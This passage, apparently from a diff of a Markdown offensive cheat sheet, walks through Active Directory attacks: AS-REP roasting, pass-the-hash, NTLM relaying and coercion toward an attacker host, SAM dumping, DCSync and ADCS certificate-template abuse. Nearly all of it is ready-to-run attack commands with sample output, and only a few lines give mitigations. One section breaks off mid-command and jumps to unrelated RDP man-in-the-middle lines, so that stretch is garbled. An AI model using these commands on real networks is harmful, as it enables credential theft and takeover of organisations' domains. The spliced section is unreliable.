+ ``` + +* [GetNPUsers](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py) from Impacket Suite + ```powershell + $ python GetNPUsers.py htb.local/svc-alfresco -no-pass + [*] Getting TGT for svc-alfresco + $krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7a[...]e776b4 + + # extract hashes + root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast + root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast + ``` + +* CrackMapExec Module + ```powershell + $ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt + LDAP 10.0.2.11 389 dc01 $krb5asrep$23$john.doe@LAB.LOCAL:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5 + ``` + +Using `hashcat` or `john` to crack the ticket. + +```powershell +# crack AS_REP messages with hashcat +root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt +root@windows:hashcat$ hashcat64.exe -m 18200 '' -a 0 c:\wordlists\rockyou.txt + +# crack AS_REP messages with john +C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproast +``` + +**Mitigations**: +* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). + + +## Kerberoasting w/o domain account + +> In September 2022 a vulnerability was discovered by [Charlie Clark](https://exploit.ph/), ST (Service Tickets) can be obtained through KRB_AS_REQ request without having to control any Active Directory account. If a principal can authenticate without pre-authentication (like AS-REP Roasting attack), it is possible to use it to launch an **KRB_AS_REQ** request and trick the request to ask for a **ST** instead of a **encrypted TGT**, by modifying the **sname** attribute in the req-body part of the request. 
+ +The technique is fully explained in this article: [Semperis blog post](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/). + +:warning: You must provide a list of users because we don't have a valid account to query the LDAP using this technique. + +* [impacket/GetUserSPNs.py from PR #1413](https://github.com/fortra/impacket/pull/1413) + ```powershell + GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/ + ``` +* [GhostPack/Rubeus from PR #139](https://github.com/GhostPack/Rubeus/pull/139) + ```powershell + Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE" + ``` + + +## CVE-2022-33679 + +> CVE-2022-33679 performs an encryption downgrade attack by forcing the KDC to use the RC4-MD4 algorithm and then brute forcing the session key from the AS-REP using a known plaintext attack, Similar to AS-REP Roasting, it works against accounts that have pre-authentication disabled and the attack is unauthenticated meaning we don’t need a client’s password.. + +Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html + +**Requirements**: +- Accounts with the attribute **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`) + +* using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679) + ```bash + user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL + user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache + user@hostname:~$ crackmapexec smb DC01.DOMAIN.LOCAL -k --shares + ``` + +**Mitigations**: +* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). +* Disable RC4 cipher if possible. 
+ + +## Timeroasting + +> Timeroasting takes advantage of Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer account by sending an NTP request with that account's RID + +* [SecuraBV/Timeroast](https://github.com/SecuraBV/Timeroast) - Timeroasting scripts by Tom Tervoort + ```ps1 + sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt + hashcat -m 31300 ntp-hashes.txt + ``` + + +## Pass-the-Hash + +The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. + +* Metasploit + ```powershell + use exploit/windows/smb/psexec + set RHOST 10.2.0.3 + set SMBUser jarrieta + set SMBPass nastyCutt3r + # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack. + # NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) + set PAYLOAD windows/meterpreter/bind_tcp + run + shell + ``` +* CrackMapExec + ```powershell + cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" + ``` +* Impacket suite + ```powershell + proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d + ``` +* Windows RDP and mimikatz + ```powershell + sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863 + sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" + ``` + +You can extract the local **SAM database** to find the local administrator hash : + +```powershell +C:\> reg.exe save hklm\sam c:\temp\sam.save +C:\> reg.exe save hklm\security c:\temp\security.save +C:\> reg.exe save hklm\system c:\temp\system.save +$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL +``` + + +## OverPass-the-Hash (pass the key) + +In this technique, instead of passing the 
hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT). + +### Using impacket + +```bash +root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ropnop.com +root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache" +root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass + +# also with the AES Key if you have it +root@kali:~$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com + +root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5 +root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM +root@kali:~$ klist +``` + +### Using Rubeus + +```powershell +# Request a TGT as the target user and pass it into the current session +# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs +.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt + +# More stealthy variant, but requires the AES256 hash +.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt + +# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation) +.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe +``` + + +## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens + +> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication (they are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys. + +:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes. 
+ +**Requirements**: +* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`) + +**Exploitation**: +* Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge + ```ps1 + HTTPS = On + DNS = On + LDAP = On + ... + ; Custom challenge. + ; Use "Random" for generating a random challenge for each requests (Default) + Challenge = 1122334455667788 + ``` +* Fire Responder: `responder -I eth0 --lm`, if `--disable-ess` is set, extended session security will be disabled for NTLMv1 authentication +* Force a callback: + ```ps1 + PetitPotam.exe Responder-IP DC-IP # Patched around August 2021 + PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP # Not patched for authenticated users + ``` +* If you got some `NetNTLMv1 tokens`, you can try to **shuck** them online via [Shuck.Sh](https://shuck.sh/) or locally/on-premise via [ShuckNT](https://github.com/yanncam/ShuckNT/) to get NT-hashes corresponding from [HIBP database](https://haveibeenpwned.com/Passwords). If the NT-hash has previously leaked, the NetNTLMv1 is converted to NT-hash ([pass-the-hash](#pass-the-hash) ready) instantly. The [shucking process](https://www.youtube.com/watch?v=OQD3qDYMyYQ&ab_channel=PasswordVillage) works for any NetNTLMv1 with or without ESS/SSP (challenge != `1122334455667788`) but mainly for user account (plaintext previsouly leaked). + ```ps1 + # Submit NetNTLMv1 online to https://shuck.sh/get-shucking.php + # Or shuck them on-premise via ShuckNT script: + $ php shucknt.php -f tokens-samples.txt -w pwned-passwords-ntlm-reversed-ordered-by-hash-v8.bin + [...] + 10 hashes-challenges analyzed in 3 seconds, with 8 NT-Hash instantly broken for pass-the-hash and 1 that can be broken via crack.sh for free. 
+ [INPUT] ycam::ad:DEADC0DEDEADC0DE00000000000000000000000000000000:70C249F75FB6D2C0AC2C2D3808386CCAB1514A2095C582ED:1122334455667788 + [NTHASH-SHUCKED] 93B3C62269D55DB9CA660BBB91E2BD0B + ``` +* If you got some `NetNTLMv1 tokens`, you can also try to crack them via [Crack.Sh](https://crack.sh/) (cloud service when available, more time and potentially chargeable). For this you need to format them to submit them on [Crack.Sh](https://crack.sh/netntlm/). The Converter of [Shuck.Sh](https://shuck.sh/) can be used to convert format easily. + ```ps1 + # When there is no-ESS/SSP and the challenge is set to 1122334455667788, it's free (0$): + username::hostname:response:response:challenge -> NTHASH:response + NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972 + + # When there is ESS/SSP or challenge != 1122334455667788, it's chargeable from $20-$200: + username::hostname:lmresponse+0padding:ntresponse:challenge -> $NETNTLM$challenge$ntresponse + $NETNTLM$DEADC0DEDEADC0DE$507E2A2131F4AF4A299D8845DE296F122CA076D49A80476E + ``` +* Finaly, if no [Shuck.Sh](https://shuck.sh/) nor [Crack.Sh](https://crack.sh/) can be used, you can try to break NetNTLMv1 with Hashcat / John The Ripper + ```ps1 + john --format=netntlm hash.txt + hashcat -m 5500 -a 3 hash.txt # for NetNTLMv1(-ESS/SSP) to plaintext (for user account) + hashcat -m 27000 -a 0 hash.txt nthash-wordlist.txt # for NetNTLMv1(-ESS/SSP) to NT-hash (for user and computer account, depending on nthash-wordlist quality) + hashcat -m 14000 -a 3 inputs.txt --hex-charset -1 /usr/share/hashcat/charsets/DES_full.hcchr ?1?1?1?1?1?1?1?1 # for NetNTLMv1(-ESS/SSP) to DES-keys (KPA-attack) of user/computer account with 100% success rate, then regenerate NT-hash with these DES-keys on https://shuck.sh/converter.php. 
+ ``` +* Now you can DCSync using the Pass-The-Hash with the DC machine account + +:warning: NetNTLMv1 with ESS / SSP (Extended Session Security / Security Support Provider) changes the final challenge by adding a new alea (!= `1122334455667788`, so chargeable on [Crack.Sh](https://crack.sh/)). + +:warning: NetNTLMv1 format is `login::domain:lmresp:ntresp:clientChall`. If the `lmresp` contains a **0's-padding** this means that the token is protected by **ESS/SSP**. + +:warning: NetNTLMv1 final challenge is the Responder's challenge itself (`1122334455667788`) when there is no ESS/SSP. If ESS/SSP is enabled, the final challenge is the first 8 bytes of the MD5 hash from the concatenation of the client challenge and server challenge. The details of the algorithmic generation of a NetNTLMv1 are illustrated on the [Shuck.Sh Generator](https://shuck.sh/generator.php) and detailed in [MISCMag#128](https://connect.ed-diamond.com/misc/misc-128/shuck-hash-before-trying-to-crack-it). + +:warning: If you get some tokens from other tools ([hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) or [chapcrack](https://github.com/moxie0/chapcrack)) in other formats, like tokens starting with the prefix `$MSCHAPv2$`, `$NETNTLM$` or `$99$`, they correspond to a classic NetNTLMv1 and can be converted from one format to another [here](https://shuck.sh/converter.php). + + +**Mitigations**: + +* Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM` + +## Capturing and cracking Net-NTLMv2/NTLMv2 hashes + +If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. 
+ +```powershell +# https://github.com/lgandx/Responder +$ sudo ./Responder.py -I eth0 -wfrd -P -v + +# https://github.com/Kevin-Robertson/InveighZero +PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y [-Elevated N] + +# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Invoke-Inveigh.ps1 +PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y –mDNS Y –Proxy Y -MachineAccounts Y +``` + +Crack the hashes with Hashcat / John The Ripper + +```ps1 +john --format=netntlmv2 hash.txt +hashcat -m 5600 -a 3 hash.txt +``` + + +## Man-in-the-Middle attacks & relaying + +NTLMv1 and NTLMv2 can be relayed to connect to another machine. + +| Hash | Hashcat | Attack method | +|---|---|---| +| LM | `3000` | crack/pass the hash | +| NTLM/NTHash | `1000` | crack/pass the hash | +| NTLMv1/Net-NTLMv1 | `5500` | crack/relay attack | +| NTLMv2/Net-NTLMv2 | `5600` | crack/relay attack | + +Crack the hash with `hashcat`. + +```powershell +hashcat -m 5600 -a 0 hash.txt crackstation.txt +``` + +### MS08-068 NTLM reflection + +NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008. + +> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials. + +* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068 + +```powershell +msf > use exploit/windows/smb/smb_relay +msf exploit(smb_relay) > show targets +``` + +### LDAP signing not required and LDAP channel binding disabled + +During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed: +* LDAP signing not required (by default set to `Not required`) +* LDAP channel binding is disabled. 
(by default disabled) +* `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default) + +Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer. +```bash +# On first terminal +sudo ./Responder.py -I eth0 -wfrd -P -v + +# On second terminal +sudo python ./ntlmrelayx.py -t ldaps://IP_DC --add-computer +``` +It is required here to relay to LDAP over TLS because creating accounts is not allowed over an unencrypted connection. + +### SMB Signing Disabled and IPv4 + +If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. Also called **LLMNR/NBNS Poisoning** + +1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`. + ```powershell + [Responder Core] + ; Servers to start + ... + SMB = Off # Turn this off + HTTP = Off # Turn this off + ``` +2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`. +3. Run `python Responder.py -I ` +4. Use a relay tool such as `ntlmrelayx` or `MultiRelay` + - `impacket-ntlmrelayx -tf targets.txt` to dump the SAM database of the targets in the list. + - `python MultiRelay.py -t -u ALL` +5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions. 
+ ```powershell + $ impacket-ntlmrelayx -tf /tmp/targets.txt -socks -smb2support + [*] Servers started, waiting for connections + Type help for list of commands + ntlmrelayx> socks + Protocol Target Username Port + -------- -------------- ------------------------ ---- + MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 + SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 + MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 + + # You might need to select a target with "-t" + # smb://, mssql://, http://, https://, imap://, imaps://, ldap://, ldaps:// and smtp:// + impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support + impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support + + # the socks proxy can then be used with your Impacket tools or CrackMapExec + $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1 + $ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth + $ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1" + ``` + +**Mitigations**: + + * Disable LLMNR via group policy + ```powershell + Open gpedit.msc and navigate to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution and set to Enabled + ``` + * Disable NBT-NS + ```powershell + This can be achieved by navigating through the GUI to Network card > Properties > IPv4 > Advanced > WINS and then under "NetBIOS setting" select Disable NetBIOS over TCP/IP + ``` + +### SMB Signing Disabled and IPv6 + +Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS. 
+ +```powershell +crackmapexec smb $hosts --gen-relay-list relay.txt + +# DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6 +# -d is the domain name that we filter our request on - the attacked domain +# -i is the interface we have mitm6 listen on for events +mitm6 -i eth0 -d $domain + +# spoofing WPAD and relaying NTLM credentials +impacket-ntlmrelayx -6 -wh $attacker_ip -of loot -tf relay.txt +impacket-ntlmrelayx -6 -wh $attacker_ip -l /tmp -socks -debug + +# -ip is the interface you want the relay to run on +# -wh is for WPAD host, specifying your wpad file to serve +# -t is the target where you want to relay to. +impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2 +``` + +### Drop the MIC + +> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP + +Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner) + +```powershell +python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' +[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth +[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected) +``` + +- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. 
The attacker account can now use DCSync to dump all password hashes in AD + ```powershell + TERM1> python printerbug.py testsegment.local/username@s2012exc.testsegment.local + TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support + TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc + ``` + + +- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. + ```powershell + # create a new machine account + TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support + TERM2> python printerbug.py relaytest.local/username@second-dc-server 10.0.2.6 + TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME + + # connect using the ticket + export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache + secretsdump.py -k -no-pass second-dc-server.local -just-dc + ``` + +### Ghost Potato - CVE-2019-1384 + +Requirements: +* User must be a member of the local Administrators group +* User must be a member of the Backup Operators group +* Token must be elevated + +Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impacket-ghostpotato.zip + +```powershell +ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe +``` + +### RemotePotato0 DCOM DCE RPC relay + +> It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine + +Requirements: +- a shell in session 0 (e.g. 
WinRm shell or SSH shell) +- a privileged user is logged on in the session 1 (e.g. a Domain Admin user) + +```powershell +# https://github.com/antonioCoco/RemotePotato0/ +Terminal> sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 & # Can be omitted for Windows Server <= 2016 +Terminal> sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1 +Session0> RemotePotato0.exe -r 192.168.83.130 -p 9998 -s 2 +Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135' +``` + + +### DNS Poisonning - Relay delegation with mitm6 + +Requirements: +- IPv6 enabled (Windows prefers IPV6 over IPv4) +- LDAP over TLS (LDAPS) + +> ntlmrelayx relays the captured credentials to LDAP on the domain controller, uses that to create a new machine account, print the account's name and password and modifies the delegation rights of it. + +```powershell +git clone https://github.com/fox-it/mitm6.git +cd /opt/tools/mitm6 +pip install . + +mitm6 -hw ws02 -d lab.local --ignore-nofqnd +# -d: the domain name that we filter our request on (the attacked domain) +# -i: the interface we have mitm6 listen on for events +# -hw: host whitelist + +ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad +ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad --add-computer +# -ip: the interface you want the relay to run on +# -wh: WPAD host, specifying your wpad file to serve +# -t: the target where you want to relay to + +# now granting delegation rights and then do a RBCD +ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad +getST.py -spn cifs/target.lab.local lab.local/GENERATED\$ -impersonate Administrator +export KRB5CCNAME=administrator.ccache +secretsdump.py -k -no-pass target.lab.local +``` + +### Relaying with WebDav Trick + +> Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained 
Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB + +**Requirement**: +* WebClient service + +**Exploitation**: +* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf` +* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0 +* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support` +* Discover WebDAV services + ```ps1 + webclientservicescanner 'domain.local'/'user':'password'@'machine' + crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav + GetWebDAVStatus.exe 'machine' + ``` +* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. + ```ps1 + # PrinterBug + dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + SpoolSample.exe "ATTACKER_IP" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" + + # PetitPotam + Petitpotam.py "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + ``` +* Use the created account to ask for a service ticket: + ```ps1 + .\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l +pyrdp-mitp.py : # with custom port +pyrdp-mitm.py -k private_key.pem -c certificate.pem # with custom key and certificate +``` +* Exploitation + * If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge + * If NLA is disabled, you will obtain the password in plaintext + * Other features are available such as keystroke recording +* Alternatives + * S3th: 
https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener + +## Active Directory Certificate Services + +* Find ADCS Server + * `crackmapexec ldap domain.lab -u username -p password -M adcs` + * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=,OU=Users,DC=domain,DC=local' -w '' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` +* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump` + +### ESC1 - Misconfigured Certificate Templates + +> Domain Users can enroll in the **VulnTemplate** template, which can be used for client authentication and has **ENROLLEE_SUPPLIES_SUBJECT** set. This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA). Allows additional identities to be bound to a certificate beyond the Subject. + +**Requirements** + +* Template that allows for AD authentication +* **ENROLLEE_SUPPLIES_SUBJECT** flag +* [PKINIT] Client Authentication, Smart Card Logon, Any Purpose, or No EKU (Extended/Enhanced Key Usage) + + +**Exploitation** + +* Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates + ```ps1 + Certify.exe find /vulnerable + Certify.exe find /vulnerable /currentuser + # or + PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local' + # or + certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound + ``` +* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to 
impersonate) + ```ps1 + # request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt. + Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin + certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN + certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local' + ``` +* Use OpenSSL and convert the certificate, do not enter a password + ```ps1 + openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx + ``` +* Move the cert.pfx to the target machine filesystem and request a TGT for the altname user using Rubeus + ```ps1 + Rubeus.exe asktgt /user:domadmin /certificate:C:\Temp\cert.pfx + ``` + +**WARNING**: These certificates will still be usable even if the user or computer resets their password! + +**NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2**, **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**, **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints. + + +### ESC2 - Misconfigured Certificate Templates + +**Requirements** + +* Allows requesters to specify a Subject Alternative Name (SAN) in the CSR as well as allows Any Purpose EKU (2.5.29.37.0) + +**Exploitation** + +* Find template + ```ps1 + PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local' + ``` +* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates). + + +### ESC3 - Misconfigured Enrollment Agent Templates + +> ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). 
This EKU can be used to request certificates on behalf of other users + +* Request a certificate based on the vulnerable certificate template ESC3. + ```ps1 + $ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC3' + [*] Saved certificate and private key to 'john.pfx' + ``` +* Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user + ```ps1 + $ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx' + ``` + + +### ESC4 - Access Control Vulnerabilities + +> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability + +* Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) + ```ps1 + python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl + ``` +* Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1 + ```ps1 + python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag + + # Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template. + C:\>StandIn.exe --adcs --filter WebServer --ess --add + ``` +* Perform ESC1 and then restore the value + ```ps1 + python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag + ``` + +Using Certipy + +```ps1 +# overwrite the configuration to make it vulnerable to ESC1 +certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old +# request a certificate based on the ESC4 template, just like ESC1. 
